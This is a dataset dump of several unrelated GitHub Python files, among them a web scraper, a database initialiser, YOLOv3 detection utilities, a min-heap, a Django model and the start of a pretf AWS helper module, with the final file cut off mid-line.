\n# \n# \n# \"\"\"\n# return Response(text=index, content_type='text/html')\n\n\ndef init_app():\n \"\"\"Prepare aiohttp web server for further running.\"\"\"\n app = Application()\n\n init_logging()\n init_db(app)\n\n sio.attach(app)\n aiojobs_setup(app)\n\n app.add_routes(monobank_routes)\n app.add_routes(internal_routes)\n\n app.on_startup.append(init_config)\n\n app.middlewares.append(db)\n app.middlewares.append(body_validator_middleware)\n app.middlewares.append(error_middleware({\n 404: handle_404,\n 405: handle_405,\n 500: handle_500\n }))\n\n return app\n","repo_name":"SpentlessInc/spentless-collector","sub_path":"collector/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72795624161","text":"import csv\nimport datetime\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\nfrom urllib.parse import urlparse\nfrom collections import Counter \nfrom stop_words import get_stop_words\n\ndef clean_word(word):\n word = word.replace('!', '')\n word = word.replace('?', '')\n word = word.replace('.', '')\n word = word.replace(':', '')\n word = word.replace(';', '')\n word = word.replace(',', '')\n word = word.replace('(', '')\n word = word.replace(')', '')\n word = word.replace('-', '')\n word = word.replace('2', '')\n word = word.replace('3', '')\n word = word.replace('4', '')\n word = word.replace('5', '')\n word = word.replace('\"\"', '')\n return word\n\ndef clean_up_words(words):\n new_words = []\n pkg_stop_words = get_stop_words('en')\n #print(pkg_stop_words)\n my_stop_words = ['the', 'is', 'and']\n for word in words:\n word = word.lower()\n cleaned_word = clean_word(word)\n if word in my_stop_words or word in pkg_stop_words:\n pass\n else:\n new_words.append(cleaned_word)\n return new_words\n\ndef create_csv_path(csv_path):\n if not os.path.exists(csv_path):\n with open(csv_path, 'w') as csvfile:\n header_columns = ['word', 'count', 'timestamp']\n writer = csv.DictWriter(csvfile, fieldnames=header_columns)\n writer.writeheader() \n\n\nstatic_url = 'https://www.lexologics.nl/logics'\nmy_url = input('Enter the URL to scrape (or press enter for default): ')\nmy_html_tag = input('Enter the HTML tag for scraping (or press enter for ): ')\nmy_div_class_tag = ''\n\nif not my_url:\n my_url = static_url\nif not my_html_tag:\n my_html_tag = 'body'\nelif my_html_tag == 'div':\n my_div_class_tag = input('Which class: ')\n\nprint(f'Grabbing {my_url} ...')\ndomain = urlparse(my_url).netloc\nprint('via domain', domain)\n\nresponse = requests.get(my_url)\n\nprint(\"Status is:\", response.status_code)\n\n#if response.status_code == 200:\n# print('Go ahead and scrape')\n#else:\n# print(\"You can't scrape this\", response.status_code)\n\nif response.status_code != 200:\n print(\"You can't scrape this\", response.status_code)\nelse:\n print(f'Scraping {my_url}...', response.status_code)\n #print(response.text)\n html = response.text\n soup = BeautifulSoup(html, 'html.parser')\n\n if my_html_tag == 'body':\n body_ = soup.find('body') \n print(body_.text)\n print('\\nFind', len(body_.text), f'characters in the <{my_html_tag}> tag')\n elif my_html_tag == 'div':\n body_ = soup.find('div', {'class': {my_div_class_tag}}) \n create_list = list(body_)\n print('\\nFind', len(body_), f'object(s) in the list for the <{my_html_tag}> tag')\n \n # Showing 'one' record from tje list\n show = int(input(f'Which record to show 0 / {len(body_)-1}: '))\n\n if show < int(len(body_)):\n create_list = list(body_)\n print(create_list[show])\n else:\n print('Index out of bound') \n\n else:\n body_ = soup.find_all(my_html_tag)\n print('\\nFind', len(body_), f'objects in the list for the <{my_html_tag}> tag')\n\n words = body_.text.split()\n clean_words = clean_up_words(words)\n word_counts = Counter(clean_words)\n print(word_counts.most_common(30)) \n \n filename = domain.replace('.', '-') + '.csv'\n path = 'csv/' + filename\n time_stamp = datetime.datetime.now()\n create_csv_path(path)\n with open(path, 'a') as csvfile:\n header_columns = ['word', 'count', 'timestamp']\n writer = csv.DictWriter(csvfile, fieldnames=header_columns)\n for word, count in word_counts.most_common(30):\n writer.writerow({\n 'count': count,\n 'word': word,\n 'timestamp': time_stamp\n })\n \n\n\n\n\n","repo_name":"lexologics/scraping","sub_path":"src/scrape1.py","file_name":"scrape1.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19593528305","text":"import logging\n\nfrom provisioner.singleton import Singleton\n\nlog = logging.getLogger(__name__)\n\n\nclass ConfigMap(metaclass=Singleton):\n \"\"\"\n Global configuration map instance.\n\n A dictionary-like class. An instance of this class manages configuration\n for an application run. This class is supposed to take care of any\n configuration source precedence handling.\n \"\"\"\n\n def __init__(self, **kwargs):\n opts = [\n \"action\",\n \"debug\",\n \"distro\",\n \"executable\",\n \"exec_args\",\n \"machine\",\n \"script\",\n \"ssh_key_file\",\n ]\n\n self._values = dict(zip(opts, [None] * len(opts)))\n self._values.update(kwargs)\n\n def __contains__(self, item):\n return item in self._values\n\n def __getitem__(self, key):\n if type(key) is not str:\n raise TypeError\n\n return self._values[key]\n\n def __setitem__(self, key, value):\n if type(key) is not str:\n raise TypeError\n\n self._values[key] = value\n","repo_name":"libvirt/libvirt-gitlab-executor","sub_path":"src/provisioner/configmap.py","file_name":"configmap.py","file_ext":"py","file_size_in_byte":1067,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"42448395069","text":"from utils.file import read_file_content\r\n\r\n\r\ndef display(field):\r\n screen = [None]*6\r\n for x in range(6):\r\n screen[x] = [False]*50\r\n\r\n for (x, y) in field:\r\n screen[y][x] = True\r\n\r\n for row in screen:\r\n s = \"\";\r\n for b in row:\r\n if b:\r\n s += \"#\"\r\n else:\r\n s += \".\"\r\n print(s)\r\n\r\n\r\ndef handle_input(lines):\r\n field = {}\r\n for line in lines:\r\n new_field = {}\r\n (cmd, param) = line.split(\" \", 1)\r\n if cmd == \"rect\":\r\n new_field = field\r\n (width, height) = [int(x) for x in param.split(\"x\")]\r\n # print(\"Rect (\" + str(width) + \", \" + str(height) + \")\")\r\n for x in range(width):\r\n for y in range(height):\r\n new_field[(x, y)] = True\r\n elif cmd == \"rotate\":\r\n (col, coords) = param.split(\" \", 1)\r\n (index, value) = [int(x) for x in coords[2:].split(\" by \")]\r\n # print(\"Rotate (\" + col + \", \" + str(index) + \", \" + str(value) + \")\")\r\n if col == \"row\":\r\n for (x, y) in field:\r\n if y == index:\r\n new_field[((x+value) % 50, y)] = True\r\n else:\r\n new_field[(x, y)] = True\r\n elif col == \"column\":\r\n for (x, y) in field:\r\n if x == index:\r\n new_field[(x, (y+value) % 6)] = True\r\n else:\r\n new_field[(x, y)] = True\r\n field = new_field\r\n return field\r\n\r\n\r\ndef solve_part1(inp: str) -> int:\r\n lines = inp.split(\"\\n\")\r\n\r\n field = handle_input(lines)\r\n\r\n return len(field)\r\n\r\n\r\ndef solve_part2(inp: str) -> int:\r\n lines = inp.split(\"\\n\")\r\n\r\n field = handle_input(lines)\r\n display(field)\r\n\r\n return -1\r\n\r\n\r\ndef test_part1():\r\n inp = read_file_content(\"inputs/test\")\r\n answer = int(read_file_content(\"inputs/ans1\"))\r\n\r\n result = solve_part1(inp)\r\n if result == answer:\r\n print(\"Test successful\")\r\n else:\r\n print(\"Test unsuccessful: \" + str(result) + \", expected: \" + str(answer))\r\n\r\n\r\ndef test_part2():\r\n inp = read_file_content(\"inputs/test\")\r\n answer = int(read_file_content(\"inputs/ans2\"))\r\n\r\n result = solve_part2(inp)\r\n if result == answer:\r\n print(\"Test successful\")\r\n else:\r\n print(\"Test unsuccessful: \" + str(result) + \", expected: \" + str(answer))\r\n\r\n\r\nif __name__ == '__main__':\r\n\r\n inp = read_file_content(\"inputs/input\")\r\n\r\n print(\" --- Part 1 --- \")\r\n test_part1()\r\n print(\"Part 1 result:\\t\" + str(solve_part1(inp)))\r\n\r\n print(\"\\n --- Part 2 ---\")\r\n test_part2()\r\n print(\"Part 2 result:\\t\" + str(solve_part2(inp)))\r\n","repo_name":"Aeilko/Advent-of-Code-2016","sub_path":"day08/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2907557897","text":"from tools.logging import logger\nfrom tools.database.db_con import get_db_instance\nfrom tools.database.tables.users.add_user import add_user\nfrom tools.database.tables.roles.add_role import add_role\nimport psycopg2\nimport os\n\ndef check_if_table_exist(table_name, cur):\n command = \"\"\"\n SELECT EXISTS (\n SELECT relname\n FROM pg_class\n WHERE relname = '{}'\n )\n \"\"\".format(table_name)\n cur.execute(command)\n result = cur.fetchone()[0]\n return result\n\ndef init_user_table(cur):\n # Check if the user table exist. If not, create it\n if not check_if_table_exist(\"users\", cur):\n logger.info(\"CREATE USERS TABLE\")\n command = \"\"\"\n CREATE TABLE IF NOT EXISTS users(\n id uuid PRIMARY KEY NOT NULL UNIQUE,\n firstname varchar(24) NOT NULL,\n lastname varchar(24) NOT NULL,\n email varchar(50) NOT NULL UNIQUE,\n password varchar(255) NOT NULL,\n role uuid NOT NULL,\n FOREIGN KEY(role) REFERENCES roles(id),\n isActive boolean NOT NULL DEFAULT true\n )\n \"\"\"\n cur.execute(command)\n # Check if the admin user exist. If not create it\n command = \"\"\"\n SELECT EXISTS (\n SELECT email\n FROM public.users\n WHERE email = 'admin@blt.com'\n )\n \"\"\"\n cur.execute(command)\n result = cur.fetchone()[0]\n if not result:\n logger.info(\"CREATE ADMIN USER\")\n role_command = \"\"\"\n SELECT *\n FROM public.roles\n WHERE name = 'admin'\n \"\"\"\n cur.execute(role_command)\n role_id = cur.fetchone()[0]\n add_user(cur, \"admin\", \"admin\", \"admin@blt.com\", \"admin123\", role_id)\n \ndef init_roles_table(cur):\n # Check if the user table exist. If not, create it\n if not check_if_table_exist(\"roles\", cur):\n logger.info(\"CREATE ROLES TABLE\")\n command = \"\"\"\n CREATE TABLE IF NOT EXISTS roles(\n id uuid PRIMARY KEY NOT NULL UNIQUE,\n name varchar(24) NOT NULL,\n levelOfAccess integer NOT NULL CHECK (levelOfAccess >= 0)\n )\n \"\"\"\n cur.execute(command)\n # Check if the admin role exist. If not create it\n command = \"\"\"\n SELECT EXISTS (\n SELECT name\n FROM public.roles\n WHERE name = 'admin'\n )\n \"\"\"\n cur.execute(command)\n result = cur.fetchone()[0]\n if not result:\n logger.info(\"CREATE ADMIN ROLE\")\n add_role(cur, \"admin\", 1)\n \n # Check if the user role exist. If not create it\n command = \"\"\"\n SELECT EXISTS (\n SELECT name\n FROM public.roles\n WHERE name = 'user'\n )\n \"\"\"\n cur.execute(command)\n result = cur.fetchone()[0]\n if not result:\n logger.info(\"CREATE USER ROLE\")\n add_role(cur, \"user\",0)\n \ndef init_categories_table(cur):\n # Check if the categories table exist. If not, create it\n if not check_if_table_exist(\"categories\", cur):\n logger.info(\"CREATE CATEGORIES TABLE\")\n command = \"\"\"\n CREATE TABLE IF NOT EXISTS categories(\n id uuid PRIMARY KEY NOT NULL UNIQUE,\n name varchar(64) NOT NULL UNIQUE\n )\n \"\"\"\n cur.execute(command)\n \ndef init_subcategories_table(cur):\n # Check if the categories table exist. If not, create it\n if not check_if_table_exist(\"subcategories\", cur):\n logger.info(\"CREATE SUBCATEGORIES TABLE\")\n command = \"\"\"\n CREATE TABLE IF NOT EXISTS subcategories(\n id uuid PRIMARY KEY NOT NULL UNIQUE,\n name varchar(64) NOT NULL UNIQUE\n )\n \"\"\"\n cur.execute(command)\n \ndef init_content_table(cur):\n # Check if the categories table exist. If not, create it\n if not check_if_table_exist(\"contents\", cur):\n logger.info(\"CREATE CONTENTS TABLE\")\n command = \"\"\"\n CREATE TABLE IF NOT EXISTS contents(\n id uuid PRIMARY KEY NOT NULL UNIQUE,\n name varchar(64) NOT NULL,\n path text NOT NULL,\n category uuid NOT NULL,\n FOREIGN KEY(category) REFERENCES categories(id),\n subcategory uuid NOT NULL,\n FOREIGN KEY(subcategory) REFERENCES subcategories(id),\n type varchar(24) NOT NULL\n )\n \"\"\"\n cur.execute(command)\n \ndef init_database(cur):\n cur.execute(\"SELECT 1 FROM pg_catalog.pg_database WHERE datname = 'blt'\")\n exists = cur.fetchone()\n if not exists:\n cur.execute('CREATE DATABASE blt')\n\ndef init_db():\n logger.info(\"INIT DB\")\n db = psycopg2.connect(host=os.getenv('DB_HOST'), user=os.getenv('DB_USER'), password=os.getenv('DB_PASS'), port=os.getenv('DB_PORT'))\n db.autocommit = True\n cursor = db.cursor()\n init_database(cursor)\n db.close()\n db, cursor = get_db_instance()\n \n init_roles_table(cursor)\n init_user_table(cursor)\n init_categories_table(cursor)\n init_subcategories_table(cursor)\n init_content_table(cursor)\n \n db.commit()","repo_name":"irvinglopezcuriel/BrainLearningTechnology","sub_path":"tools/database/init_db.py","file_name":"init_db.py","file_ext":"py","file_size_in_byte":5240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40808979955","text":"import numpy as np\nimport cv2 as cv\n\ndef apply_multi_band(func, arr, args, kargs):\n results = []\n for i in range(arr.shape[0]):\n r = func(arr[i], *args, **kargs)\n results.append(r)\n return results\n\ndef multi_band(func):\n\n def _f(*args, **kargs):\n if 'channel_last' in kargs:\n channel_last = kargs['channel_last']\n else:\n channel_last = False\n arr = args[0]\n if len(arr.shape) == 3:\n if channel_last:\n arr = np.transpose(arr, (2, 0, 1))\n result = apply_multi_band(func, arr, args[1:], kargs)\n result = np.stack(result, 0)\n if channel_last:\n result = np.transpose(result, (1, 2, 0))\n return result\n else:\n return func(*args, **kargs)\n return _f\n\n@multi_band\ndef resize(arr, size = None, scale = None, channel_last = False, interpolation = cv.INTER_LINEAR ):\n if size is None and scale is None:\n return arr\n assert len(arr.shape) == 2\n ow, oh = arr.shape\n # print(size)\n if size is None:\n size = (int(ow * scale[0]), int(oh * scale[1]))\n if size[0] == ow and size[1] == oh:\n return arr\n arr = cv.resize(arr, size, interpolation = interpolation )\n return arr \n\n@multi_band\ndef crop(arr, x, y, w, h, channel_last = False):\n assert len(arr.shape) == 2\n ow, oh = arr.shape\n assert x + w <= ow and y + h <= oh\n narr = arr[x:x+w, y:y+h]\n return narr\n\n@multi_band\ndef flip(arr, h_v, channel_last = False):\n assert len(arr.shape) == 2\n assert h_v in (0, 1)\n arr = np.flip(arr, axis=h_v)\n return arr\n\n@multi_band\ndef rot90(arr, k, r = False, channel_last = False):\n assert len(arr.shape) == 2\n if r:\n k = -k\n arr = np.rot90(arr, k, (0, 1))\n return arr\n","repo_name":"w-copper/weakly-pseudo-label","sub_path":"weak_pseudo_label/dataset/pipeline/functional.py","file_name":"functional.py","file_ext":"py","file_size_in_byte":1816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"10825206930","text":"import os\nimport codecs\nimport math\nimport time\nimport tqdm\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport numpy as np\nimport torchvision\nimport cv2\n\ndef letterbox(img, new_shape=(416, 416), color=(114, 114, 114), auto=True, scaleFill=False, scaleup=True):\n # Resize image to a 32-pixel-multiple rectangle https://github.com/ultralytics/yolov3/issues/232\n shape = img.shape[:2] # current shape [height, width]\n if isinstance(new_shape, int):\n new_shape = (new_shape, new_shape)\n\n # Scale ratio (new / old)\n r = min(new_shape[0] / shape[0], new_shape[1] / shape[1])\n if not scaleup: # only scale down, do not scale up (for better test mAP)\n r = min(r, 1.0)\n\n # Compute padding\n ratio = r, r # width, height ratios\n new_unpad = int(round(shape[1] * r)), int(round(shape[0] * r))\n dw, dh = new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding\n if auto: # minimum rectangle\n dw, dh = np.mod(dw, 64), np.mod(dh, 64) # wh padding\n elif scaleFill: # stretch\n dw, dh = 0.0, 0.0\n new_unpad = new_shape\n ratio = new_shape[0] / shape[1], new_shape[1] / shape[0] # width, height ratios\n\n dw /= 2 # divide padding into 2 sides\n dh /= 2\n\n if shape[::-1] != new_unpad: # resize\n img = cv2.resize(img, new_unpad, interpolation=cv2.INTER_LINEAR)\n top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1))\n left, right = int(round(dw - 0.1)), int(round(dw + 0.1))\n img = cv2.copyMakeBorder(img, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border\n return img, ratio, (dw, dh)\n\n\n\ndef resize(image, size):\n image = F.interpolate(image.unsqueeze(0), size=size, mode=\"nearest\").squeeze(0)\n return image\n\ndef pad_to_square(img, pad_value):\n c, h, w = img.shape\n dim_diff = np.abs(h - w)\n # (upper / left) padding and (lower / right) padding\n pad1, pad2 = dim_diff // 2, dim_diff - dim_diff // 2\n # Determine padding\n pad = (0, 0, pad1, pad2) if h <= w else (pad1, pad2, 0, 0)\n # Add padding\n img = F.pad(img, pad, \"constant\", value=pad_value)\n\n return img, pad\n\n\ndef load_classes(classes_path):\n \"\"\"\n Loads class labels at 'path'\n \"\"\"\n classes_path = os.path.expanduser(classes_path)\n with codecs.open(classes_path, 'r', 'utf-8') as f:\n class_names = f.readlines()\n class_names = [c.strip() for c in class_names]\n return class_names\n\n\ndef rescale_boxes_rect(coords, img1_shape, img0_shape, ratio_pad=None):\n # Rescale coords (xyxy) from img1_shape to img0_shape\n if ratio_pad is None: # calculate from img0_shape\n gain = max(img1_shape) / max(img0_shape) # gain = old / new\n pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding\n else:\n gain = ratio_pad[0][0]\n pad = ratio_pad[1]\n\n coords[:, [0, 2]] -= pad[0] # x padding\n coords[:, [1, 3]] -= pad[1] # y padding\n coords[:, :4] /= gain\n clip_coords(coords, img0_shape)\n return coords\n\n\ndef clip_coords(boxes, img_shape):\n # Clip bounding xyxy bounding boxes to image shape (height, width)\n boxes[:, 0].clamp_(0, img_shape[1]) # x1\n boxes[:, 1].clamp_(0, img_shape[0]) # y1\n boxes[:, 2].clamp_(0, img_shape[1]) # x2\n boxes[:, 3].clamp_(0, img_shape[0]) # y2\n\ndef rescale_boxes(boxes, current_dim, original_shape):\n \"\"\" Rescales bounding boxes to the original shape \"\"\"\n orig_h, orig_w = original_shape\n # The amount of padding that was added\n pad_x = max(orig_h - orig_w, 0) * (current_dim / max(original_shape))\n pad_y = max(orig_w - orig_h, 0) * (current_dim / max(original_shape))\n # Image height and width after padding is removed\n unpad_h = current_dim - pad_y\n unpad_w = current_dim - pad_x\n # Rescale bounding boxes to dimension of original image\n boxes[:, 0] = ((boxes[:, 0] - pad_x // 2) / unpad_w) * orig_w\n boxes[:, 1] = ((boxes[:, 1] - pad_y // 2) / unpad_h) * orig_h\n boxes[:, 2] = ((boxes[:, 2] - pad_x // 2) / unpad_w) * orig_w\n boxes[:, 3] = ((boxes[:, 3] - pad_y // 2) / unpad_h) * orig_h\n return boxes\n\n\ndef xywh2xyxy(x):\n y = x.new(x.shape)\n y[..., 0] = x[..., 0] - x[..., 2] / 2\n y[..., 1] = x[..., 1] - x[..., 3] / 2\n y[..., 2] = x[..., 0] + x[..., 2] / 2\n y[..., 3] = x[..., 1] + x[..., 3] / 2\n return y\n\ndef box_iou(box1, box2):\n # https://github.com/pytorch/vision/blob/master/torchvision/ops/boxes.py\n \"\"\"\n Return intersection-over-union (Jaccard index) of boxes.\n Both sets of boxes are expected to be in (x1, y1, x2, y2) format.\n Arguments:\n box1 (Tensor[N, 4])\n box2 (Tensor[M, 4])\n Returns:\n iou (Tensor[N, M]): the NxM matrix containing the pairwise\n IoU values for every element in boxes1 and boxes2\n \"\"\"\n\n def box_area(box):\n # box = 4xn\n return (box[2] - box[0]) * (box[3] - box[1])\n\n area1 = box_area(box1.t())\n area2 = box_area(box2.t())\n\n # inter(N,M) = (rb(N,M,2) - lt(N,M,2)).clamp(0).prod(2)\n inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)\n return inter / (area1[:, None] + area2 - inter) # iou = inter / (area1 + area2 - inter)\n\ndef non_max_suppression(prediction, conf_thres=0.1, iou_thres=0.6, multi_label=True, classes=None, agnostic=False):\n \"\"\"\n Performs Non-Maximum Suppression on inference results\n Returns detections with shape:\n nx6 (x1, y1, x2, y2, conf, cls)\n \"\"\"\n\n # Settings\n merge = True # merge for best mAP\n min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height\n time_limit = 10.0 # seconds to quit after\n\n t = time.time()\n nc = prediction[0].shape[1] - 5 # number of classes\n multi_label &= nc > 1 # multiple labels per box\n output = [None] * prediction.shape[0]\n for xi, x in enumerate(prediction): # image index, image inference\n # Apply constraints\n x = x[x[:, 4] > conf_thres] # confidence\n x = x[((x[:, 2:4] > min_wh) & (x[:, 2:4] < max_wh)).all(1)] # width-height\n\n # If none remain process next image\n if not x.shape[0]:\n continue\n\n # Compute conf\n x[..., 5:] *= x[..., 4:5] # conf = obj_conf * cls_conf\n\n # Box (center x, center y, width, height) to (x1, y1, x2, y2)\n box = xywh2xyxy(x[:, :4])\n\n # Detections matrix nx6 (xyxy, conf, cls)\n if multi_label:\n i, j = (x[:, 5:] > conf_thres).nonzero().t()\n x = torch.cat((box[i], x[i, j + 5].unsqueeze(1), j.float().unsqueeze(1)), 1)\n else: # best class only\n conf, j = x[:, 5:].max(1)\n x = torch.cat((box, conf.unsqueeze(1), j.float().unsqueeze(1)), 1)[conf > conf_thres]\n\n # Filter by class\n if classes:\n x = x[(j.view(-1, 1) == torch.tensor(classes, device=j.device)).any(1)]\n\n # Apply finite constraint\n # if not torch.isfinite(x).all():\n # x = x[torch.isfinite(x).all(1)]\n\n # If none remain process next image\n n = x.shape[0] # number of boxes\n if not n:\n continue\n\n # Sort by confidence\n # x = x[x[:, 4].argsort(descending=True)]\n\n # Batched NMS\n c = x[:, 5] * 0 if agnostic else x[:, 5] # classes\n boxes, scores = x[:, :4].clone() + c.view(-1, 1) * max_wh, x[:, 4] # boxes (offset by class), scores\n i = torchvision.ops.boxes.nms(boxes, scores, iou_thres)\n if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean)\n try: # update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)\n iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix\n weights = iou * scores[None] # box weights\n x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes\n # i = i[iou.sum(1) > 1] # require redundancy\n except: # possible CUDA error https://github.com/ultralytics/yolov3/issues/1139\n print(x, i, x.shape, i.shape)\n pass\n\n output[xi] = x[i]\n if (time.time() - t) > time_limit:\n break # time limit exceeded\n\n return output\n","repo_name":"selous123/yolov3-pytorch-custom","sub_path":"deploy_scripts/my_utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":8318,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"54"} +{"seq_id":"15109962735","text":"from django.core.validators import FileExtensionValidator\nfrom django.db import models\nfrom django.urls import reverse\n\nfrom organization.models import OrganizationProduct\n\n\nclass Product(models.Model):\n \"\"\"\n Product Model That Has 7 Fields and a Meta Class For Configuration.\n \"\"\"\n name = models.CharField(max_length=50)\n price = models.DecimalField(max_digits=10,\n decimal_places=2)\n tax = models.BooleanField(default=True)\n pdf_file = models.FileField(upload_to='files/pdf_files/%Y/%m/%d',\n validators=[FileExtensionValidator(allowed_extensions=['pdf']), ])\n pic_file = models.FileField(upload_to='files/pic_files/%Y/%m/%d',\n validators=[FileExtensionValidator(allowed_extensions=['jpg', 'jpeg', 'png', 'svg']), ])\n technical_report = models.TextField()\n related_products = models.ManyToManyField(OrganizationProduct,\n related_name='related_products')\n\n class Meta:\n \"\"\"\n Meta Class Contains ordering for order in database\n \"\"\"\n ordering = ('-price', '-name',)\n\n def __str__(self):\n return self.name\n\n def get_absolute_url(self):\n \"\"\"\n Canonical Url for access the core Class\n \"\"\"\n return reverse('inventory:detail_product', self.id)\n","repo_name":"MohammadJavadShamloo/FinalProject_Maktab_50","sub_path":"inventory/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72135116643","text":"\"\"\" \nMin Heap é uma árvore binária quase completa, \ntotalmente preenchida até o penúltimo nível e \ncom todos os nós mais à esquerda no último nível\nO menor elemento é a raiz da árvore e \nas subárvores possuem valores maiores ou iguais que o pai delas.\n\"\"\"\n\nclass min_heap:\n def __init__(self, tamanho=0):\n self.tamanho = tamanho\n self.heap = [None for i in range(self.tamanho+1)]\n self.ultimo = -1\n\n def insere(self, elemento):\n self.ultimo = self.ultimo + 1\n self.heap[self.ultimo] = elemento\n self.subir(self.ultimo)\n\n def remove(self):\n maior = self.heap[0]\n self.heap[0] = self.heap[self.ultimo]\n self.ultimo = self.ultimo - 1\n self.descer(0)\n return maior\n\n def obterMenor(self):\n return self.heap[0]\n\n def subir(self, filho):\n pai = filho // 2\n if (pai >= 0): # pai está dentro do heap\n if (self.heap[filho] < self.heap[pai]): # troca pai e filho\n self.heap[filho], self.heap[pai] = self.heap[pai], self.heap[filho]\n self.subir(pai)\n\n def descer(self, pai):\n filho = pai * 2\n if (filho <= self.ultimo):\n if (filho < self.ultimo):\n if (self.heap[filho + 1] < self.heap[filho]):\n filho = filho + 1\n if (self.heap[pai] > self.heap[filho]):\n self.heap[filho], self.heap[pai] = self.heap[pai], self.heap[filho]\n self.descer(filho)\n\n def constroiHeapDescendo(self, arvore, heap):\n \"\"\"\n Constroi a heap descendo a partir da raiz da árvore.\n \"\"\"\n if self.arvore is None:\n return\n else:\n self.constroiHeapDescendo(arvore.esquerda, heap)\n self.constroiHeapDescendo(arvore.direita, heap)\n self.heap.append(self.arvore)\n\n # def imprimeHeap(self, p):\n # if (p <= self.ultimo):\n # print(self.heap[p])\n # self.imprimeHeap(2 * p)\n # self.imprimeHeap(2 * p + 1)\n\n def imprimeHeap(self):\n i = 0\n while i <= self.ultimo:\n print(self.heap[i], end=\" \")\n i = i + 1\n\n\nif __name__ == '__main__':\n import heapq\n\n print(\"Exemplo 1\")\n print(\"Heapq python\")\n a = [10, 20, 30, 40, 50]\n heapq.heapify(a)\n print(a)\n h = min_heap(10)\n h.insere(10)\n h.insere(20)\n h.insere(30)\n h.insere(40)\n h.insere(50)\n print(\"heap:\", end=\" \")\n h.imprimeHeap()\n print(\"\")\n print(\"Minimo\")\n print(f\"Menor (sem remover): {h.obterMenor()}\")\n print(f\"Remover menor: {h.remove()}\")\n print(f\"Remover menor: {h.remove()}\")\n print(f\"Remover menor: {h.remove()}\")\n print(f\"Menor (sem remover): {h.obterMenor()}\")\n print(\"heap:\", end=\" \")\n h.imprimeHeap()\n\n print(\"\\nExemplo 2\")\n print(\"Heapq python\")\n a = [1, 2, 4, 3, 9, 7, 8, 10, 14, 16, 50]\n heapq.heapify(a)\n print(a)\n h = min_heap(11)\n h.insere(1)\n h.insere(2)\n h.insere(4)\n h.insere(3)\n h.insere(9)\n h.insere(7)\n h.insere(8)\n h.insere(10)\n h.insere(14)\n h.insere(16)\n h.insere(50)\n print(\"heap:\", end=\" \")\n h.imprimeHeap()\n print(\"\")\n print(\"Minimo\")\n print(f\"Menor (sem remover): {h.obterMenor()}\")\n print(f\"Remover menor: {h.remove()}\")\n print(f\"Remover menor: {h.remove()}\")\n print(f\"Remover menor: {h.remove()}\")\n print(f\"Menor (sem remover): {h.obterMenor()}\")\n print(\"heap:\", end=\" \")\n h.imprimeHeap()\n","repo_name":"asantos2000/master-data-structures-algorithms","sub_path":"trees/min_heap.py","file_name":"min_heap.py","file_ext":"py","file_size_in_byte":3505,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"20423823767","text":"import json\nimport os\nfrom functools import lru_cache, wraps\nfrom threading import RLock\nfrom time import sleep\nfrom typing import Any, Callable, Optional\n\nfrom boto3 import Session\n\nfrom pretf.api import block, log\nfrom pretf.blocks import Block\n\ntry:\n import boto_source_profile_mfa\n\n use_boto_source_profile_mfa = True\nexcept ImportError:\n use_boto_source_profile_mfa = False\n\n\n# Use this lock on anything that might trigger an MFA prompt,\n# because otherwise it is possible for multiple threads to\n# prompt the user at the same time, resulting in confusing\n# and broken prompts for the user. This is a flaw in boto3.\nlock = RLock()\n\n\ndef locked(func: Callable) -> Callable:\n @wraps(func)\n def wrapped(*args: Any, **kwargs: Any) -> Any:\n with lock:\n return func(*args, **kwargs)\n\n return wrapped\n\n\n@locked\ndef _assume_role(session: Session, **kwargs: str) -> Session:\n\n for key, value in list(kwargs.items()):\n if not value:\n del kwargs[key]\n\n sts_client = session.client(\"sts\")\n response = sts_client.assume_role(**kwargs)\n creds = response[\"Credentials\"]\n\n return Session(\n aws_access_key_id=creds[\"AccessKeyId\"],\n aws_secret_access_key=creds[\"SecretAccessKey\"],\n aws_session_token=creds[\"SessionToken\"],\n )\n\n\n@locked\ndef _create_s3_backend(\n session: Session, bucket: str, table: str, region_name: str\n) -> None:\n\n # Prompt before creating anything.\n account_id = get_account_id(session)\n bucket_arn = _get_s3_bucket_arn(region_name, account_id, bucket)\n table_arn = _get_dynamodb_table_arn(region_name, account_id, table)\n log.ok(f\"backend: {bucket_arn}\")\n log.ok(f\"backend: {table_arn}\")\n if not log.accept(\"backend: create backend resources\"):\n log.bad(\"backend: not created\")\n raise SystemExit(1)\n\n # Use the S3 bucket and DynamoDB table name for the CloudFormation stack.\n if bucket == table:\n stack_name = bucket\n else:\n stack_name = f\"{bucket}-{table}\"\n stack_arn = _get_cloudformation_stack_arn(region_name, account_id, stack_name)\n log.ok(f\"backend: creating {stack_arn}\")\n\n # Create the stack.\n cloudformation_client = 